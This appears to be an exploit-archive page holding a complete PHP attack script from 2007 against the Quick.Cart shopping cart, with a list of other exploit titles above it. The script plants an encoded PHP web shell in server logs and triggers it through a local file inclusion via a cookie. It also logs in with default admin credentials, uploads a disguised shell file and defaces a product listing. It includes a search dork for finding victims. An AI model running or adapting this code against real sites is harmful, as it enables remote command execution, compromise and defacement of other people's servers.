477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
374 lines
13 KiB
PHP
Executable file
374 lines
13 KiB
PHP
Executable file
<?php
|
|
/*
|
|
Exploit Name:
|
|
Quick.Cart <= v2.2 Remote Local Include Exploit & Remote Code Execution Exploit
|
|
|
|
Autor: Kacper
|
|
Contact: kacper1964@yahoo.pl
|
|
Homepage: http://www.rahim.webd.pl/
|
|
Kacper Hacking & Security Blog: http://kacper.bblog.pl/
|
|
Irc: irc.milw0rm.com:6667 #devilteam
|
|
|
|
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.
|
|
|
|
Pozdrawiam pl.zone-h.org, a najbardziej demo, oraz cala ekipe Zone-H.Org :)
|
|
|
|
//dork: "Powered by Quick.Cart"
|
|
|
|
script homepage/download/demo: http://opensolution.org/
|
|
*/
|
|
|
|
if ($argc<4) {
|
|
print_r('
|
|
---------------------------------------------------------------------------
|
|
Usage: php '.$argv[0].' host path cmd OPTIONS
|
|
host: target server (ip/hostname)
|
|
path: path to Quick.Cart
|
|
cmd: a shell command
|
|
Options:
|
|
-p[port]: specify a port other than 80
|
|
-P[ip:port]: specify a proxy
|
|
-L[Login]: Admin login (Default: admin)
|
|
-H[Password]: Admin password (Default: admin)
|
|
Example:
|
|
php '.$argv[0].' localhost /Quick.Cart/ ls -la
|
|
php '.$argv[0].' localhost /Quick.Cart/ ls -la -Ladmin -Hadmin
|
|
php '.$argv[0].' localhost /Quick.Cart/ ls -la -P1.1.1.1:80
|
|
---------------------------------------------------------------------------
|
|
');
|
|
die;
|
|
}
|
|
error_reporting(7);
|
|
ini_set("max_execution_time",0);
|
|
ini_set("default_socket_timeout",5);
|
|
|
|
function quick_dump($string)
|
|
{
|
|
$result='';$exa='';$cont=0;
|
|
for ($i=0; $i<=strlen($string)-1; $i++)
|
|
{
|
|
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
|
|
{$result.=" .";}
|
|
else
|
|
{$result.=" ".$string[$i];}
|
|
if (strlen(dechex(ord($string[$i])))==2)
|
|
{$exa.=" ".dechex(ord($string[$i]));}
|
|
else
|
|
{$exa.=" 0".dechex(ord($string[$i]));}
|
|
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
|
|
}
|
|
return $exa."\r\n".$result;
|
|
}
|
|
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
|
|
|
|
function wyslijpakiet($pakiet)
|
|
{
|
|
global $proxy, $host, $port, $html, $proxy_regex;
|
|
if ($proxy=='') {
|
|
$ock=fsockopen(gethostbyname($host),$port);
|
|
if (!$ock) {
|
|
echo 'No response from '.$host.':'.$port; die;
|
|
}
|
|
}
|
|
else {
|
|
$c = preg_match($proxy_regex,$proxy);
|
|
if (!$c) {
|
|
echo 'Not a valid proxy...';die;
|
|
}
|
|
$parts=explode(':',$proxy);
|
|
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
|
|
$ock=fsockopen($parts[0],$parts[1]);
|
|
if (!$ock) {
|
|
echo 'No response from proxy...';die;
|
|
}
|
|
}
|
|
fputs($ock,$pakiet);
|
|
if ($proxy=='') {
|
|
$html='';
|
|
while (!feof($ock)) {
|
|
$html.=fgets($ock);
|
|
}
|
|
}
|
|
else {
|
|
$html='';
|
|
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
|
|
$html.=fread($ock,1);
|
|
}
|
|
}
|
|
fclose($ock);
|
|
}
|
|
$host=$argv[1];
|
|
$path=$argv[2];
|
|
$port=80;
|
|
$proxy="";
|
|
$login="admin";
|
|
$haslo="admin";
|
|
$cmd="";
|
|
for ($i=3; $i<$argc; $i++){
|
|
$temp=$argv[$i][0].$argv[$i][1];
|
|
if (($temp<>'-p') and ($temp<>'-P')) {$cmd.=" ".$argv[$i];}
|
|
if ($temp=="-p")
|
|
{
|
|
$port=str_replace("-p","",$argv[$i]);
|
|
}
|
|
if ($temp=="-P")
|
|
{
|
|
$proxy=str_replace("-P","",$argv[$i]);
|
|
}
|
|
if ($temp=="-L")
|
|
{
|
|
$login=str_replace("-L","",$argv[$i]);
|
|
}
|
|
if ($temp=="-H")
|
|
{
|
|
$haslo=str_replace("-H","",$argv[$i]);
|
|
}
|
|
}
|
|
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'bad patch!'; die;}
|
|
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
|
|
/*
|
|
how its works :)
|
|
|
|
in file "config/general.php" lines 12-33:
|
|
|
|
################################################################################
|
|
$config['dir_config'] = 'config/';
|
|
$config['dir_core'] = 'core/';
|
|
$config['dir_db'] = 'db/';
|
|
$config['dir_js'] = 'js/';
|
|
$config['dir_libraries'] = 'libraries/';
|
|
$config['dir_tpl'] = 'templates/';
|
|
$config['dir_files'] = 'files/';
|
|
$config['dir_ext'] = 'ext/';
|
|
$config['dir_plugins'] = 'plugins/';
|
|
$config['dir_lang'] = 'lang/';
|
|
|
|
if( isset( $sLang ) && is_file( $config['dir_lang'].$sLang.'.php' ) && strlen( $sLang ) == 2 ){
|
|
setCookie( 'sLanguage', $sLang, time( ) + 86400 );
|
|
define( 'LANGUAGE', $sLang );
|
|
}
|
|
else{
|
|
if( isset( $_COOKIE['sLanguage'] ) ) <-------------------------[^]
|
|
define( 'LANGUAGE', $_COOKIE['sLanguage'] ); <-------------------------[^^]
|
|
else
|
|
define( 'LANGUAGE', $config['default_lang'] );
|
|
}
|
|
################################################################################
|
|
|
|
and in index.php we can find line 32:
|
|
|
|
################################################################################
|
|
require_once DIR_LANG.LANGUAGE.'.php'; <-------------------------[^^^]
|
|
################################################################################
|
|
|
|
we can define LANGUAGE string.
|
|
|
|
Now how remote code execution:
|
|
|
|
in admin panel can upload any file on serwer, if you have admin login and password. Default admin login and password in script is "admin" many users dont change it!!
|
|
They don't edit file "config/general.php" lines 75-76:
|
|
$config['login'] = "admin";
|
|
$config['pass'] = "admin";
|
|
|
|
;)
|
|
|
|
Elo :)
|
|
*/
|
|
|
|
echo "insert evil code in logfiles to run local include ...\r\n\r\n";
|
|
$hauru2 = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
|
|
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
|
|
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
|
|
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
|
|
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
|
|
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
|
|
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
|
|
$pakiet="GET ".$p.$hauru2." HTTP/1.0\r\n";
|
|
$pakiet.="User-Agent: ".$hauru2." Googlebot/2.1\r\n";
|
|
$pakiet.="Host: ".$host."\r\n";
|
|
$pakiet.="Connection: close\r\n\r\n";
|
|
wyslijpakiet($pakiet);
|
|
sleep(1);
|
|
$paths= array (
|
|
"../../../../../var/log/httpd/access_log",
|
|
"../../../../../var/log/httpd/error_log",
|
|
"../apache/logs/error.log",
|
|
"../apache/logs/access.log",
|
|
"../../apache/logs/error.log",
|
|
"../../apache/logs/access.log",
|
|
"../../../apache/logs/error.log",
|
|
"../../../apache/logs/access.log",
|
|
"../../../../apache/logs/error.log",
|
|
"../../../../apache/logs/access.log",
|
|
"../../../../../apache/logs/error.log",
|
|
"../../../../../apache/logs/access.log",
|
|
"../logs/error.log",
|
|
"../logs/access.log",
|
|
"../../logs/error.log",
|
|
"../../logs/access.log",
|
|
"../../../logs/error.log",
|
|
"../../../logs/access.log",
|
|
"../../../../logs/error.log",
|
|
"../../../../logs/access.log",
|
|
"../../../../../logs/error.log",
|
|
"../../../../../logs/access.log",
|
|
"../../../../../etc/httpd/logs/access_log",
|
|
"../../../../../etc/httpd/logs/access.log",
|
|
"../../../../../etc/httpd/logs/error_log",
|
|
"../../../../../etc/httpd/logs/error.log",
|
|
"../../../../../var/www/logs/access_log",
|
|
"../../../../../var/www/logs/access.log",
|
|
"../../../../../usr/local/apache/logs/access_log",
|
|
"../../../../../usr/local/apache/logs/access.log",
|
|
"../../../../../var/log/apache/access_log",
|
|
"../../../../../var/log/apache/access.log",
|
|
"../../../../../var/log/access_log",
|
|
"../../../../../var/www/logs/error_log",
|
|
"../../../../../var/www/logs/error.log",
|
|
"../../../../../usr/local/apache/logs/error_log",
|
|
"../../../../../usr/local/apache/logs/error.log",
|
|
"../../../../../var/log/apache/error_log",
|
|
"../../../../../var/log/apache/error.log",
|
|
"../../../../../var/log/access_log",
|
|
"../../../../../var/log/error_log"
|
|
);
|
|
for ($i=0; $i<=count($paths)-1; $i++)
|
|
{$a=$i+2;
|
|
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
|
|
echo "remote code execution...wait..\n";
|
|
$pakiet ="GET ".$p."index.php HTTP/1.1\r\n";
|
|
$pakiet.="Cookie: sLanguage=../".$paths[$i]."%00;\r\n";
|
|
$pakiet.="HAURU: ".$cmd."\r\n";
|
|
$pakiet.="Host: ".$host."\r\n";
|
|
$pakiet.="Connection: Close\r\n\r\n";
|
|
wyslijpakiet($pakiet);
|
|
if (strstr($html,"Hauru"))
|
|
{$temp=explode("Hauru",$html);
|
|
die($temp[1]);
|
|
}else{echo "can't run evil code :/ ..\n";}}
|
|
$data ="_POST[sLogin]=".$login."&_POST[sPass]=".$haslo."&submit=sign%20in%20»";
|
|
$pakiet ="POST ".$p."admin.php?p=login HTTP/1.0\r\n";
|
|
$pakiet.="Host: ".$host."\r\n";
|
|
$pakiet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n";
|
|
$pakiet.="Content-Type: application/x-www-form-urlencoded\r\n";
|
|
$pakiet.="Content-Length: ".strlen($data)."\r\n";
|
|
$pakiet.="Accept: text/plain\r\n";
|
|
$pakiet.="Connection: Close\r\n\r\n";
|
|
$pakiet.=$data;
|
|
wyslijpakiet($pakiet);
|
|
$temp=explode("Set-Cookie: ",$html);
|
|
$cookie="";
|
|
for ($i=1; $i<count($temp); $i++)
|
|
{$temp2=explode(" ",$temp[$i]);
|
|
$cookie.=" ".$temp2[0];}
|
|
$temp=explode("PHPSESSID=",$cookie);
|
|
$temp2=explode(";",$temp[1]);
|
|
$ciacho=$temp2[0];
|
|
echo "Now remote code execution with admin account..\n";
|
|
echo $ciacho."\n";
|
|
$hauru=
|
|
"\x20\x0d\x0a\x47\x49\x46\x38\x36\x0d\x0a\x3c\x3f\x70\x68\x70\x20".
|
|
"\x6f\x62\x5f\x63\x6c\x65\x61\x6e\x28\x29\x3b\x0d\x0a\x2f\x2f\x52".
|
|
"\x75\x63\x68\x6f\x6d\x79\x20\x7a\x61\x6d\x65\x6b\x20\x48\x61\x75".
|
|
"\x72\x75\x20\x3b\x2d\x29\x0d\x0a\x65\x63\x68\x6f\x22\x2e\x2e\x2e".
|
|
"\x48\x61\x63\x6b\x65\x72\x2e\x2e\x4b\x61\x63\x70\x65\x72\x2e\x2e".
|
|
"\x4d\x61\x64\x65\x2e\x2e\x69\x6e\x2e\x2e\x50\x6f\x6c\x61\x6e\x64".
|
|
"\x21\x21\x2e\x2e\x2e\x44\x45\x56\x49\x4c\x2e\x54\x45\x41\x4d\x2e".
|
|
"\x2e\x74\x68\x65\x2e\x2e\x62\x65\x73\x74\x2e\x2e\x70\x6f\x6c\x69".
|
|
"\x73\x68\x2e\x2e\x74\x65\x61\x6d\x2e\x2e\x47\x72\x65\x65\x74\x7a".
|
|
"\x2e\x2e\x2e\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x65\x63\x68".
|
|
"\x6f\x22\x2e\x2e\x2e\x47\x6f\x20\x54\x6f\x20\x44\x45\x56\x49\x4c".
|
|
"\x20\x54\x45\x41\x4d\x20\x49\x52\x43\x3a\x20\x37\x32\x2e\x32\x30".
|
|
"\x2e\x31\x38\x2e\x36\x3a\x36\x36\x36\x37\x20\x23\x64\x65\x76\x69".
|
|
"\x6c\x74\x65\x61\x6d\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x65".
|
|
"\x63\x68\x6f\x22\x2e\x2e\x2e\x44\x45\x56\x49\x4c\x20\x54\x45\x41".
|
|
"\x4d\x20\x53\x49\x54\x45\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77".
|
|
"\x77\x77\x2e\x72\x61\x68\x69\x6d\x2e\x77\x65\x62\x64\x2e\x70\x6c".
|
|
"\x2f\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x69\x6e\x69\x5f\x73".
|
|
"\x65\x74\x28\x22\x6d\x61\x78\x5f\x65\x78\x65\x63\x75\x74\x69\x6f".
|
|
"\x6e\x5f\x74\x69\x6d\x65\x22\x2c\x30\x29\x3b\x0d\x0a\x20\x0d\x0a".
|
|
"\x20\x0d\x0a\x65\x63\x68\x6f\x20\x22\x48\x61\x75\x72\x75\x22\x3b".
|
|
"\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x70\x61\x73\x73\x74\x68\x72\x75".
|
|
"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54\x54\x50\x5f\x48".
|
|
"\x41\x55\x52\x55\x5d\x29\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x64".
|
|
"\x69\x65\x3b\x3f\x3e\x0d\x0a\x20";
|
|
$data.='-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="sName"
|
|
|
|
DEVIL TEAM
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="aCategories[]"
|
|
|
|
1
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="fPrice"
|
|
|
|
10000000.00
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="sDescriptionShort"
|
|
|
|
Hacked by Polish Hackers
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="sDescriptionFull"
|
|
|
|
http://www.rahim.webd.pl/
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="iPosition"
|
|
|
|
-99
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="iStatus"
|
|
|
|
1
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="aFiles[]"; filename="hauru.php"
|
|
Content-Type: text/plain
|
|
|
|
'.$hauru.'
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="aFilesDescription[]"
|
|
|
|
1
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="aFilesPosition[]"
|
|
|
|
1
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="iProduct"
|
|
|
|
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="sOption"
|
|
|
|
save
|
|
-----------------------------7d6224c08dc
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
zapisz »
|
|
-----------------------------7d6224c08dc--
|
|
';
|
|
$pakiet ="POST ".$p."admin.php?p=productsList&sOption=save HTTP/1.0\r\n";
|
|
$pakiet.="Content-Type: multipart/form-data; boundary=-----------------------------7d6224c08dc\r\n";
|
|
$pakiet.="Accept-Language: pl\r\n";
|
|
$pakiet.="Proxy-Connection: Keep-Alive\r\n";
|
|
$pakiet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n";
|
|
$pakiet.="Cookie: sLogin=".$login."; PHPSESSID=".$ciacho."\r\n";
|
|
$pakiet.="Content-Length: ".strlen($data)."\r\n";
|
|
$pakiet.="Connection: Close\r\n\r\n";
|
|
$pakiet.=$data;
|
|
wyslijpakiet($pakiet);
|
|
sleep(1);
|
|
echo "Now try to remote code execution...\n";
|
|
$pakiet ="GET ".$p."files/hauru.php HTTP/1.1\r\n";
|
|
$pakiet.="HAURU: ".$cmd."\r\n";
|
|
$pakiet.="Host: ".$host."\r\n";
|
|
$pakiet.="Connection: Close\r\n\r\n";
|
|
wyslijpakiet($pakiet);
|
|
if (strstr($html,"Hauru"))
|
|
{$temp=explode("Hauru",$html);
|
|
die($temp[1]);}
|
|
echo "Cant find evil file :/ maybe this version script is too old but is not vulnerable ...";
|
|
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam ";
|
|
?>
|
|
|
|
# milw0rm.com [2007-06-02]
|